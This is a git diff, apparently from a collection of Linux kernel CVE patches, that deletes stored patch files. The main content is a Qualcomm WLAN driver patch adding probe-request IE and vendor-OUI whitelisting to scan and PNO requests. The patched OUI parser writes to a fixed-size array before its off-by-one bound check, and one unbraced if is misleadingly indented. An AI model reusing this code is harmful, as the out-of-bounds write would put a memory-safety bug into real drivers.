-+			hex_value[indx] |= ((temp[i + 1] - 'A') + 0xA);
-+			i = i + 1;
-+			indx = indx + 1;
-+		} else {
-+			/* invalid character in oui */
-+			return false;
-+		}
-+	}
-+
-+	voui->oui_type = (hex_value[0] | (hex_value[1] << 8) |
-+			 (hex_value[2] << 16));
-+	voui->oui_subtype = hex_value[3];
-+
-+	hdd_info("OUI_type = %x and OUI_subtype = %x",
-+		 voui->oui_type, voui->oui_subtype);
-+
-+	return true;
-+}
-+
-+int hdd_parse_probe_req_ouis(hdd_context_t *hdd_ctx)
-+{
-+	struct vendor_oui voui[MAX_PROBE_REQ_OUIS];
-+	uint8_t *str;
-+	uint8_t temp[9];
-+	uint32_t start = 0, end = 0;
-+	uint32_t oui_indx = 0;
-+	uint32_t i = 0;
-+
-+	hdd_ctx->config->probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN - 1] =
-+									'\0';
-+	if (!strlen(hdd_ctx->config->probe_req_ouis)) {
-+		hdd_ctx->no_of_probe_req_ouis = 0;
-+		hdd_ctx->probe_req_voui = NULL;
-+		hdd_info("NO OUIS to parse");
-+		return 0;
-+	}
-+
-+	str = (uint8_t *)(hdd_ctx->config->probe_req_ouis);
-+
-+	while (str[i] != '\0') {
-+		if (str[i] == ' ') {
-+			if ((end - start) != 8) {
-+				end = start = 0;
-+				i++;
-+				continue;
-+			} else {
-+				memcpy(temp, &str[i - 8], 8);
-+				i++;
-+				temp[8] = '\0';
-+				if (hdd_probe_req_voui_convert_to_hex(temp,
-+				    &voui[oui_indx]) == 0) {
-+					continue;
-+				}
-+				oui_indx++;
-+				if (oui_indx > MAX_PROBE_REQ_OUIS) {
-+					/*
-+					 * Max number of OUIs supported is 16,
-+					 * ignoring the rest
-+					 */
-+					hdd_info("Max OUIs-supported: 16");
-+					return 0;
-+				}
-+			}
-+			start = end = 0;
-+		} else {
-+			i++;
-+			end++;
-+		}
-+	}
-+
-+	if ((end - start) == 8) {
-+		memcpy(temp, &str[i - 8], 8);
-+		temp[8] = '\0';
-+		if (hdd_probe_req_voui_convert_to_hex(temp,
-+		    &voui[oui_indx]) == 1)
-+			oui_indx++;
-+	}
-+
-+	if (!oui_indx)
-+		return 0;
-+
-+	hdd_ctx->probe_req_voui = qdf_mem_malloc(oui_indx *
-+					sizeof(*hdd_ctx->probe_req_voui));
-+	if (hdd_ctx->probe_req_voui == NULL) {
-+		hdd_err("Not Enough memory for OUI");
-+		hdd_ctx->no_of_probe_req_ouis = 0;
-+		return -ENOMEM;
-+	}
-+	hdd_ctx->no_of_probe_req_ouis = oui_indx;
-+	qdf_mem_copy(hdd_ctx->probe_req_voui, voui,
-+		     oui_indx * sizeof(*hdd_ctx->probe_req_voui));
-+
-+	return 0;
-+}
-+
-+void hdd_free_probe_req_ouis(hdd_context_t *hdd_ctx)
-+{
-+	struct vendor_oui *probe_req_voui = hdd_ctx->probe_req_voui;
-+
-+	if (probe_req_voui) {
-+		hdd_ctx->probe_req_voui = NULL;
-+		qdf_mem_free(probe_req_voui);
-+	}
-+
-+	hdd_ctx->no_of_probe_req_ouis = 0;
-+}
-diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c
-index 2f3a7f9..836d6dc 100644
---- a/core/hdd/src/wlan_hdd_cfg80211.c
-+++ b/core/hdd/src/wlan_hdd_cfg80211.c
-@@ -1987,7 +1987,10 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
- 		hdd_err("Invalid ATTR");
- 		return -EINVAL;
- 	}
--	pReqMsg = qdf_mem_malloc(sizeof(*pReqMsg));
-+	pReqMsg = qdf_mem_malloc(sizeof(*pReqMsg) +
-+			(pHddCtx->no_of_probe_req_ouis) *
-+			(sizeof(struct vendor_oui)));
-+
- 	if (!pReqMsg) {
- 		hdd_err("qdf_mem_malloc failed");
- 		return -ENOMEM;
-@@ -2006,6 +2009,15 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy,
- 
- 	hdd_debug("Oui (%02x:%02x:%02x), vdev_id = %d", pReqMsg->oui[0],
- 		   pReqMsg->oui[1], pReqMsg->oui[2], pReqMsg->vdev_id);
-+
-+	if (pHddCtx->config->probe_req_ie_whitelist)
-+		wlan_hdd_fill_whitelist_ie_attrs(&pReqMsg->ie_whitelist,
-+				pReqMsg->probe_req_ie_bitmap,
-+				&pReqMsg->num_vendor_oui,
-+				(struct vendor_oui *)((uint8_t *)pReqMsg +
-+				sizeof(*pReqMsg)),
-+				pHddCtx);
-+
- 	status = sme_set_scanning_mac_oui(pHddCtx->hHal, pReqMsg);
- 	if (!QDF_IS_STATUS_SUCCESS(status)) {
- 		hdd_err("sme_set_scanning_mac_oui failed(err=%d)", status);
-diff --git a/core/hdd/src/wlan_hdd_main.c b/core/hdd/src/wlan_hdd_main.c
-index c726f88..103f529 100644
---- a/core/hdd/src/wlan_hdd_main.c
-+++ b/core/hdd/src/wlan_hdd_main.c
-@@ -4993,6 +4993,8 @@ static void hdd_context_destroy(hdd_context_t *hdd_ctx)
- 
- 	hdd_context_deinit(hdd_ctx);
- 
-+	hdd_free_probe_req_ouis(hdd_ctx);
-+
- 	qdf_mem_free(hdd_ctx->config);
- 	hdd_ctx->config = NULL;
- 
-@@ -6875,6 +6877,21 @@ static hdd_context_t *hdd_context_create(struct device *dev)
- 	hdd_debug("Setting configuredMcastBcastFilter: %d",
- 		   hdd_ctx->config->mcastBcastFilterSetting);
- 
-+	if (hdd_ctx->config->probe_req_ie_whitelist) {
-+		if (hdd_validate_prb_req_ie_bitmap(hdd_ctx)) {
-+			/* parse ini string probe req oui */
-+			if (hdd_parse_probe_req_ouis(hdd_ctx)) {
-+				hdd_err("Error parsing probe req ouis");
-+				hdd_err("disable probe req ie whitelisting");
-+				hdd_ctx->config->probe_req_ie_whitelist = false;
-+			}
-+		} else {
-+			hdd_err("invalid probe req ie bitmap and ouis");
-+			hdd_err("disable probe req ie whitelisting");
-+			hdd_ctx->config->probe_req_ie_whitelist = false;
-+		}
-+	}
-+
- 	if (hdd_ctx->config->fhostNSOffload)
- 		hdd_ctx->ns_offload_enable = true;
- 
-@@ -6934,6 +6951,7 @@ err_free_config:
- 	qdf_mem_free(hdd_ctx->config);
- 
- err_free_hdd_context:
-+	hdd_free_probe_req_ouis(hdd_ctx);
- 	wiphy_free(hdd_ctx->wiphy);
- 
- err_out:
-diff --git a/core/hdd/src/wlan_hdd_power.c b/core/hdd/src/wlan_hdd_power.c
-index 8b48f42..5e3ecb2 100644
---- a/core/hdd/src/wlan_hdd_power.c
-+++ b/core/hdd/src/wlan_hdd_power.c
-@@ -1673,6 +1673,8 @@ err_wiphy_unregister:
- 		ptt_sock_deactivate_svc();
- 		nl_srv_exit();
- 
-+		hdd_free_probe_req_ouis(pHddCtx);
-+
- 		/* Free up dynamically allocated members inside HDD Adapter */
- 		qdf_mem_free(pHddCtx->config);
- 		pHddCtx->config = NULL;
-diff --git a/core/hdd/src/wlan_hdd_scan.c b/core/hdd/src/wlan_hdd_scan.c
-index 84b14ed..1f97c66 100644
---- a/core/hdd/src/wlan_hdd_scan.c
-+++ b/core/hdd/src/wlan_hdd_scan.c
-@@ -1557,6 +1557,7 @@ static int __wlan_hdd_cfg80211_scan(struct wiphy *wiphy,
- 	hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- 	hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
- 	hdd_wext_state_t *pwextBuf = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-+	hdd_station_ctx_t *station_ctx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
- 	struct hdd_config *cfg_param = NULL;
- 	tCsrScanRequest scan_req;
- 	uint8_t *channelList = NULL, i;
-@@ -1970,6 +1971,27 @@ static int __wlan_hdd_cfg80211_scan(struct wiphy *wiphy,
- 	wlan_hdd_update_scan_rand_attrs((void *)&scan_req, (void *)request,
- 					WLAN_HDD_HOST_SCAN);
- 
-+	if (!hdd_conn_is_connected(station_ctx) &&
-+	    (pHddCtx->config->probe_req_ie_whitelist)) {
-+		if (pHddCtx->no_of_probe_req_ouis != 0) {
-+			scan_req.voui = qdf_mem_malloc(
-+						pHddCtx->no_of_probe_req_ouis *
-+						sizeof(struct vendor_oui));
-+			if (!scan_req.voui) {
-+				hdd_info("Not enough memory for voui");
-+				scan_req.num_vendor_oui = 0;
-+				status = -ENOMEM;
-+				goto free_mem;
-+			}
-+		}
-+
-+		wlan_hdd_fill_whitelist_ie_attrs(&scan_req.ie_whitelist,
-+						scan_req.probe_req_ie_bitmap,
-+						&scan_req.num_vendor_oui,
-+						scan_req.voui,
-+						pHddCtx);
-+	}
-+
- 	qdf_runtime_pm_prevent_suspend(&pHddCtx->runtime_context.scan);
- 	status = sme_scan_request(WLAN_HDD_GET_HAL_CTX(pAdapter),
- 				pAdapter->sessionId, &scan_req,
-@@ -2005,6 +2027,9 @@ free_mem:
- 	if (status == 0)
- 		scan_ebusy_cnt = 0;
- 
-+	if (scan_req.voui)
-+		qdf_mem_free(scan_req.voui);
-+
- 	EXIT();
- 	return status;
- }
-@@ -2796,6 +2821,7 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- 	hdd_scaninfo_t *pScanInfo = &pAdapter->scan_info;
- 	struct hdd_config *config = NULL;
- 	uint32_t num_ignore_dfs_ch = 0;
-+	hdd_station_ctx_t *station_ctx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
- 
- 	ENTER();
- 
-@@ -2853,7 +2879,15 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- 		}
- 	}
- 
--	pPnoRequest = (tpSirPNOScanReq) qdf_mem_malloc(sizeof(tSirPNOScanReq));
-+	if (!hdd_conn_is_connected(station_ctx) &&
-+	    (pHddCtx->config->probe_req_ie_whitelist))
-+		pPnoRequest =
-+			(tpSirPNOScanReq)qdf_mem_malloc(sizeof(tSirPNOScanReq) +
-+				(pHddCtx->no_of_probe_req_ouis) *
-+				(sizeof(struct vendor_oui)));
-+	else
-+		pPnoRequest = qdf_mem_malloc(sizeof(tSirPNOScanReq));
-+
- 	if (NULL == pPnoRequest) {
- 		hdd_err("qdf_mem_malloc failed");
- 		return -ENOMEM;
-@@ -3013,6 +3047,16 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- 	wlan_hdd_update_scan_rand_attrs((void *)pPnoRequest, (void *)request,
- 					WLAN_HDD_PNO_SCAN);
- 
-+	if (pHddCtx->config->probe_req_ie_whitelist &&
-+	    !hdd_conn_is_connected(station_ctx))
-+		wlan_hdd_fill_whitelist_ie_attrs(&pPnoRequest->ie_whitelist,
-+					pPnoRequest->probe_req_ie_bitmap,
-+					&pPnoRequest->num_vendor_oui,
-+					(struct vendor_oui *)(
-+					(uint8_t *)pPnoRequest +
-+					sizeof(*pPnoRequest)),
-+					pHddCtx);
-+
- 	status = sme_set_preferred_network_list(WLAN_HDD_GET_HAL_CTX(pAdapter),
- 						pPnoRequest,
- 						pAdapter->sessionId,
-@@ -3322,3 +3366,33 @@ int hdd_scan_context_init(hdd_context_t *hdd_ctx)
- 
- 	return 0;
- }
-+
-+void wlan_hdd_fill_whitelist_ie_attrs(bool *ie_whitelist,
-+				      uint32_t *probe_req_ie_bitmap,
-+				      uint32_t *num_vendor_oui,
-+				      struct vendor_oui *voui,
-+				      hdd_context_t *hdd_ctx)
-+{
-+	uint32_t i = 0;
-+
-+	*ie_whitelist = true;
-+	probe_req_ie_bitmap[0] = hdd_ctx->config->probe_req_ie_bitmap_0;
-+	probe_req_ie_bitmap[1] = hdd_ctx->config->probe_req_ie_bitmap_1;
-+	probe_req_ie_bitmap[2] = hdd_ctx->config->probe_req_ie_bitmap_2;
-+	probe_req_ie_bitmap[3] = hdd_ctx->config->probe_req_ie_bitmap_3;
-+	probe_req_ie_bitmap[4] = hdd_ctx->config->probe_req_ie_bitmap_4;
-+	probe_req_ie_bitmap[5] = hdd_ctx->config->probe_req_ie_bitmap_5;
-+	probe_req_ie_bitmap[6] = hdd_ctx->config->probe_req_ie_bitmap_6;
-+	probe_req_ie_bitmap[7] = hdd_ctx->config->probe_req_ie_bitmap_7;
-+
-+	*num_vendor_oui = 0;
-+
-+	if ((hdd_ctx->no_of_probe_req_ouis != 0) && (voui != NULL)) {
-+		*num_vendor_oui = hdd_ctx->no_of_probe_req_ouis;
-+		for (i = 0; i < hdd_ctx->no_of_probe_req_ouis; i++) {
-+			voui[i].oui_type = hdd_ctx->probe_req_voui[i].oui_type;
-+			voui[i].oui_subtype =
-+					hdd_ctx->probe_req_voui[i].oui_subtype;
-+		}
-+	}
-+}
-diff --git a/core/hdd/src/wlan_hdd_scan.h b/core/hdd/src/wlan_hdd_scan.h
-index 96c96f4..49cce33 100644
---- a/core/hdd/src/wlan_hdd_scan.h
-+++ b/core/hdd/src/wlan_hdd_scan.h
-@@ -129,5 +129,24 @@ void hdd_cleanup_scan_queue(hdd_context_t *hdd_ctx);
- void wlan_hdd_cfg80211_abort_scan(struct wiphy *wiphy,
- 				  struct wireless_dev *wdev);
- #endif
--#endif /* end #if !defined(WLAN_HDD_SCAN_H) */
- 
-+/**
-+ * wlan_hdd_fill_whitelist_ie_attrs - fill the white list members
-+ * @ie_whitelist: enables whitelist
-+ * @probe_req_ie_bitmap: bitmap to be filled
-+ * @num_vendor_oui: pointer to no of ouis
-+ * @voui: pointer to ouis to be filled
-+ * @hdd_ctx: pointer to hdd ctx
-+ *
-+ * This function fills the ie bitmap and vendor oui fields with the
-+ * corresponding values present in config and hdd_ctx
-+ *
-+ * Return: None
-+ */
-+void wlan_hdd_fill_whitelist_ie_attrs(bool *ie_whitelist,
-+				      uint32_t *probe_req_ie_bitmap,
-+				      uint32_t *num_vendor_oui,
-+				      struct vendor_oui *voui,
-+				      hdd_context_t *hdd_ctx);
-+
-+#endif /* end #if !defined(WLAN_HDD_SCAN_H) */
-diff --git a/core/mac/inc/sir_api.h b/core/mac/inc/sir_api.h
-index f414035..644b8a8 100644
---- a/core/mac/inc/sir_api.h
-+++ b/core/mac/inc/sir_api.h
-@@ -910,6 +910,13 @@ typedef struct sSirSmeScanReq {
- 	uint8_t mac_addr[QDF_MAC_ADDR_SIZE];
- 	uint8_t mac_addr_mask[QDF_MAC_ADDR_SIZE];
- 
-+	/* probe req ie whitelisting attrs */
-+	bool ie_whitelist;
-+	uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+	uint32_t num_vendor_oui;
-+	uint32_t oui_field_len;
-+	uint32_t oui_field_offset;
-+
- 	/* channelList MUST be the last field of this structure */
- 	tSirChannelList channelList;
- 	/*-----------------------------
-@@ -928,7 +935,10 @@ typedef struct sSirSmeScanReq {
- 	   ----------------------------- <--+
- 	   ... variable size uIEFiled
- 	   up to uIEFieldLen (can be 0)
--	   -----------------------------*/
-+	   -----------------------------
-+	   ... variable size upto num_vendor_oui
-+	   struct vendor_oui voui;
-+	   -----------------------------------*/
- } tSirSmeScanReq, *tpSirSmeScanReq;
- 
- typedef struct sSirSmeScanAbortReq {
-@@ -2972,6 +2982,12 @@ typedef struct sSirPNOScanReq {
- 	bool relative_rssi_set;
- 	int8_t relative_rssi;
- 	struct connected_pno_band_rssi_pref band_rssi_pref;
-+
-+	/* probe req ie whitelisting attrs */
-+	bool ie_whitelist;
-+	uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+	uint32_t num_vendor_oui;
-+	/* followed by one or more struct vendor_oui */
- } tSirPNOScanReq, *tpSirPNOScanReq;
- 
- /* Preferred Network Found Indication */
-@@ -3819,6 +3835,13 @@ typedef struct sSirScanOffloadReq {
- 	uint8_t mac_addr[QDF_MAC_ADDR_SIZE];
- 	uint8_t mac_addr_mask[QDF_MAC_ADDR_SIZE];
- 
-+	/* probe req ie whitelisting attrs */
-+	bool ie_whitelist;
-+	uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+	uint32_t num_vendor_oui;
-+	uint32_t oui_field_len;
-+	uint32_t oui_field_offset;
-+
- 	tSirChannelList channelList;
- 	/*-----------------------------
- 	  sSirScanOffloadReq....
-@@ -3836,7 +3859,10 @@ typedef struct sSirScanOffloadReq {
- 	  ----------------------------- <--+
- 	  ... variable size uIEField
- 	  up to uIEFieldLen (can be 0)
--	  -----------------------------*/
-+	  -----------------------------
-+	  ... variable size upto num_vendor_oui
-+	  struct vendor_oui voui;
-+	  ------------------------*/
- } tSirScanOffloadReq, *tpSirScanOffloadReq;
- 
- /**
-@@ -4999,6 +5025,11 @@ typedef struct {
- 	uint8_t oui[WIFI_SCANNING_MAC_OUI_LENGTH];
- 	uint32_t vdev_id;
- 	bool enb_probe_req_sno_randomization;
-+	/* probe req ie whitelisting attrs */
-+	bool ie_whitelist;
-+	uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+	uint32_t num_vendor_oui;
-+	/* Followed by 0 or more struct vendor_oui */
- } tSirScanMacOui, *tpSirScanMacOui;
- 
- enum {
-diff --git a/core/mac/src/pe/lim/lim_process_sme_req_messages.c b/core/mac/src/pe/lim/lim_process_sme_req_messages.c
-index 4c653fb..0703dec 100644
---- a/core/mac/src/pe/lim/lim_process_sme_req_messages.c
-+++ b/core/mac/src/pe/lim/lim_process_sme_req_messages.c
-@@ -1222,7 +1222,6 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- 	uint8_t *p;
- 	tSirMsgQ msg;
- 	uint16_t i, len;
--	uint16_t addn_ie_len = 0;
- 	tSirRetStatus status, rc = eSIR_SUCCESS;
- 	tDot11fIEExtCap extracted_extcap = {0};
- 	bool extcap_present = true;
-@@ -1255,7 +1254,7 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- 	 */
- 	len = sizeof(tSirScanOffloadReq) +
- 		(pScanReq->channelList.numChannels - 1) +
--		pScanReq->uIEFieldLen;
-+		pScanReq->uIEFieldLen + pScanReq->oui_field_len;
- 
- 	pScanOffloadReq = qdf_mem_malloc(len);
- 	if (NULL == pScanOffloadReq) {
-@@ -1335,8 +1334,8 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- 		p[i] = pScanReq->channelList.channelNumber[i];
- 
- 	pScanOffloadReq->uIEFieldLen = pScanReq->uIEFieldLen;
--	pScanOffloadReq->uIEFieldOffset = len - addn_ie_len -
--						pScanOffloadReq->uIEFieldLen;
-+	pScanOffloadReq->uIEFieldOffset = len - pScanOffloadReq->uIEFieldLen -
-+						pScanReq->oui_field_len;
- 	qdf_mem_copy((uint8_t *) pScanOffloadReq +
- 		     pScanOffloadReq->uIEFieldOffset,
- 		     (uint8_t *) pScanReq + pScanReq->uIEFieldOffset,
-@@ -1351,6 +1350,23 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- 			     pScanReq->mac_addr_mask, QDF_MAC_ADDR_SIZE);
- 	}
- 
-+	pScanOffloadReq->oui_field_len = pScanReq->oui_field_len;
-+	pScanOffloadReq->num_vendor_oui = pScanReq->num_vendor_oui;
-+	pScanOffloadReq->ie_whitelist = pScanReq->ie_whitelist;
-+	if (pScanOffloadReq->ie_whitelist)
-+		qdf_mem_copy(pScanOffloadReq->probe_req_ie_bitmap,
-+			     pScanReq->probe_req_ie_bitmap,
-+			     PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+	pScanOffloadReq->oui_field_offset = sizeof(tSirScanOffloadReq) +
-+				(pScanOffloadReq->channelList.numChannels - 1) +
-+				pScanOffloadReq->uIEFieldLen;
-+	if (pScanOffloadReq->num_vendor_oui != 0) {
-+		qdf_mem_copy(
-+		(uint8_t *) pScanOffloadReq + pScanOffloadReq->oui_field_offset,
-+		(uint8_t *) pScanReq + pScanReq->oui_field_offset,
-+		pScanReq->oui_field_len);
-+	}
-+
- 	rc = wma_post_ctrl_msg(pMac, &msg);
- 	if (rc != eSIR_SUCCESS) {
- 		lim_log(pMac, LOGE, FL("wma_post_ctrl_msg() return failure"));
-diff --git a/core/sme/inc/csr_api.h b/core/sme/inc/csr_api.h
-index 788e688..211d489 100644
---- a/core/sme/inc/csr_api.h
-+++ b/core/sme/inc/csr_api.h
-@@ -297,6 +297,12 @@ typedef struct tagCsrScanRequest {
- 	bool enable_scan_randomization;
- 	uint8_t mac_addr[QDF_MAC_ADDR_SIZE];
- 	uint8_t mac_addr_mask[QDF_MAC_ADDR_SIZE];
-+
-+	/* probe req ie whitelisting attrs */
-+	bool ie_whitelist;
-+	uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+	uint32_t num_vendor_oui;
-+	struct vendor_oui *voui;
- } tCsrScanRequest;
- 
- typedef struct tagCsrScanResultInfo {
-diff --git a/core/sme/src/common/sme_power_save.c b/core/sme/src/common/sme_power_save.c
-index 4ded194..298e0b5 100644
---- a/core/sme/src/common/sme_power_save.c
-+++ b/core/sme/src/common/sme_power_save.c
-@@ -771,14 +771,19 @@ QDF_STATUS sme_set_ps_preferred_network_list(tHalHandle hal_ctx,
- 		return QDF_STATUS_E_FAILURE;
- 	}
- 
--	request_buf = qdf_mem_malloc(sizeof(tSirPNOScanReq));
-+	request_buf = qdf_mem_malloc(sizeof(tSirPNOScanReq) +
-+		      (request->num_vendor_oui) *
-+		      (sizeof(struct vendor_oui)));
-+
- 	if (NULL == request_buf) {
- 		QDF_TRACE(QDF_MODULE_ID_SME, QDF_TRACE_LEVEL_ERROR,
- 			FL("Not able to allocate memory for PNO request"));
- 		return QDF_STATUS_E_NOMEM;
- 	}
- 
--	qdf_mem_copy(request_buf, request, sizeof(tSirPNOScanReq));
-+	qdf_mem_copy(request_buf, request, sizeof(tSirPNOScanReq) +
-+			(request->num_vendor_oui) *
-+			(sizeof(struct vendor_oui)));
- 
- 	/*Must translate the mode first */
- 	uc_dot11_mode = (uint8_t) csr_translate_to_wni_cfg_dot11_mode(mac_ctx,
-diff --git a/core/sme/src/csr/csr_api_scan.c b/core/sme/src/csr/csr_api_scan.c
-index bb53967..a810f14 100644
---- a/core/sme/src/csr/csr_api_scan.c
-+++ b/core/sme/src/csr/csr_api_scan.c
-@@ -5066,7 +5066,8 @@ static QDF_STATUS csr_send_mb_scan_req(tpAniSirGlobal pMac, uint16_t sessionId,
- 		 sizeof(pMsg->channelList.channelNumber) +
- 		 (sizeof(pMsg->channelList.channelNumber) *
- 		 pScanReq->ChannelInfo.numOfChannels)) +
--		 (pScanReq->uIEFieldLen);
-+		 (pScanReq->uIEFieldLen) +
-+		 pScanReq->num_vendor_oui * sizeof(*pScanReq->voui);
- 
- 	pMsg = qdf_mem_malloc(msgLen);
- 	if (NULL == pMsg) {
-@@ -5237,6 +5238,26 @@ static QDF_STATUS csr_send_mb_scan_req(tpAniSirGlobal pMac, uint16_t sessionId,
- 			     QDF_MAC_ADDR_SIZE);
- 	}
- 
-+	pMsg->ie_whitelist = pScanReq->ie_whitelist;
-+	if (pMsg->ie_whitelist)
-+		qdf_mem_copy(pMsg->probe_req_ie_bitmap,
-+			     pScanReq->probe_req_ie_bitmap,
-+			     PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+		pMsg->num_vendor_oui = pScanReq->num_vendor_oui;
-+		pMsg->oui_field_len = pScanReq->num_vendor_oui *
-+				      sizeof(*pScanReq->voui);
-+		pMsg->oui_field_offset = (sizeof(tSirSmeScanReq) -
-+				sizeof(pMsg->channelList.channelNumber) +
-+				(sizeof(pMsg->channelList.channelNumber) *
-+				pScanReq->ChannelInfo.numOfChannels)) +
-+				pScanReq->uIEFieldLen;
-+
-+	if (pScanReq->num_vendor_oui != 0) {
-+		qdf_mem_copy((uint8_t *)pMsg + pMsg->oui_field_offset,
-+			     (uint8_t *)(pScanReq->voui),
-+			     pMsg->oui_field_len);
-+	}
-+
- send_scan_req:
- 	sms_log(pMac, LOGD,
- 		FL("scanId %d domainIdCurrent %d scanType %s (%d) bssType %s (%d) requestType %s (%d) numChannels %d"),
-@@ -5652,6 +5673,7 @@ QDF_STATUS csr_scan_copy_request(tpAniSirGlobal mac_ctx,
- 	dst_req->pIEField = NULL;
- 	dst_req->ChannelInfo.ChannelList = NULL;
- 	dst_req->SSIDs.SSIDList = NULL;
-+	dst_req->voui = NULL;
- 
- 	if (src_req->uIEFieldLen) {
- 		dst_req->pIEField =
-@@ -5809,6 +5831,29 @@ QDF_STATUS csr_scan_copy_request(tpAniSirGlobal mac_ctx,
- 	dst_req->scan_id = src_req->scan_id;
- 	dst_req->timestamp = src_req->timestamp;
- 
-+	if (src_req->num_vendor_oui == 0) {
-+		dst_req->num_vendor_oui = 0;
-+		dst_req->voui = NULL;
-+	} else {
-+		dst_req->voui = qdf_mem_malloc(src_req->num_vendor_oui *
-+					       sizeof(*dst_req->voui));
-+		if (!dst_req->voui)
-+			status = QDF_STATUS_E_NOMEM;
-+		else
-+			status = QDF_STATUS_SUCCESS;
-+
-+		if (QDF_IS_STATUS_SUCCESS(status)) {
-+			dst_req->num_vendor_oui = src_req->num_vendor_oui;
-+			qdf_mem_copy(dst_req->voui,
-+				     src_req->voui,
-+				     src_req->num_vendor_oui *
-+				     sizeof(*dst_req->voui));
-+		} else {
-+			dst_req->num_vendor_oui = 0;
-+			sms_log(mac_ctx, LOGE, FL("No memory for voui"));
-+		}
-+	}
-+
- complete:
- 	if (!QDF_IS_STATUS_SUCCESS(status)) {
- 		csr_scan_free_request(mac_ctx, dst_req);
-@@ -5836,6 +5881,12 @@ QDF_STATUS csr_scan_free_request(tpAniSirGlobal pMac, tCsrScanRequest *pReq)
- 	}
- 	pReq->SSIDs.numOfSSIDs = 0;
- 
-+	if (pReq->voui) {
-+		qdf_mem_free(pReq->voui);
-+		pReq->voui = NULL;
-+	}
-+	pReq->num_vendor_oui = 0;
-+
- 	return QDF_STATUS_SUCCESS;
- }
- 
-diff --git a/core/wma/src/wma_scan_roam.c b/core/wma/src/wma_scan_roam.c
-index d2dceca..8a78323 100644
---- a/core/wma/src/wma_scan_roam.c
-+++ b/core/wma/src/wma_scan_roam.c
-@@ -283,6 +283,17 @@ QDF_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- 	qdf_mem_copy(cmd->mac_addr_mask, scan_req->mac_addr_mask,
- 		     QDF_MAC_ADDR_SIZE);
- 
-+	/* probe req ie whitelisting attributes */
-+	cmd->ie_whitelist = scan_req->ie_whitelist;
-+	if (cmd->ie_whitelist) {
-+		for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+			cmd->probe_req_ie_bitmap[i] =
-+					scan_req->probe_req_ie_bitmap[i];
-+		cmd->num_vendor_oui = scan_req->num_vendor_oui;
-+		cmd->oui_field_len = scan_req->oui_field_len;
-+		cmd->voui = (uint8_t *)scan_req + scan_req->oui_field_offset;
-+	}
-+
- 	if (!scan_req->p2pScanType) {
- 		WMA_LOGD("Normal Scan request");
- 		cmd->scan_ctrl_flags |= WMI_SCAN_ADD_CCK_RATES;
-@@ -3174,6 +3185,18 @@ QDF_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno)
- 	params->band_rssi_pref.band = pno->band_rssi_pref.band;
- 	params->band_rssi_pref.rssi = pno->band_rssi_pref.rssi;
- 
-+	/* probe req ie whitelisting attributes */
-+	params->ie_whitelist = pno->ie_whitelist;
-+	if (params->ie_whitelist) {
-+		for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+			params->probe_req_ie_bitmap[i] =
-+					pno->probe_req_ie_bitmap[i];
-+		params->num_vendor_oui = pno->num_vendor_oui;
-+		params->oui_field_len = pno->num_vendor_oui *
-+					sizeof(struct vendor_oui);
-+		params->voui = (uint8_t *)pno;
-+	}
-+
- 	status = wmi_unified_pno_start_cmd(wma->wmi_handle,
- 					params, channel_list);
- 	if (QDF_IS_STATUS_SUCCESS(status)) {
-@@ -5599,6 +5622,7 @@ QDF_STATUS wma_reset_passpoint_network_list(tp_wma_handle wma,
- QDF_STATUS wma_scan_probe_setoui(tp_wma_handle wma, tSirScanMacOui *psetoui)
- {
- 	struct scan_mac_oui set_oui;
-+	uint32_t i = 0;
- 
- 	qdf_mem_set(&set_oui, sizeof(struct scan_mac_oui), 0);
- 
-@@ -5614,6 +5638,18 @@ QDF_STATUS wma_scan_probe_setoui(tp_wma_handle wma, tSirScanMacOui *psetoui)
- 	set_oui.enb_probe_req_sno_randomization =
- 				psetoui->enb_probe_req_sno_randomization;
- 
-+	/* probe req ie whitelisting attributes */
-+	set_oui.ie_whitelist = psetoui->ie_whitelist;
-+	if (set_oui.ie_whitelist) {
-+		for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+			set_oui.probe_req_ie_bitmap[i] =
-+						psetoui->probe_req_ie_bitmap[i];
-+		set_oui.num_vendor_oui = psetoui->num_vendor_oui;
-+		set_oui.oui_field_len = psetoui->num_vendor_oui *
-+					sizeof(struct vendor_oui);
-+		set_oui.voui = (uint8_t *)psetoui;
-+	}
-+
- 	return wmi_unified_scan_probe_setoui_cmd(wma->wmi_handle,
- 						&set_oui);
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11023/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11023/3.18/0001.patch
deleted file mode 100644
index dea3e339..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11023/3.18/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 17ef83c708be034454df7914ef5484c36515eece Mon Sep 17 00:00:00 2001
-From: Jonathan Solnit <jsolnit@google.com>
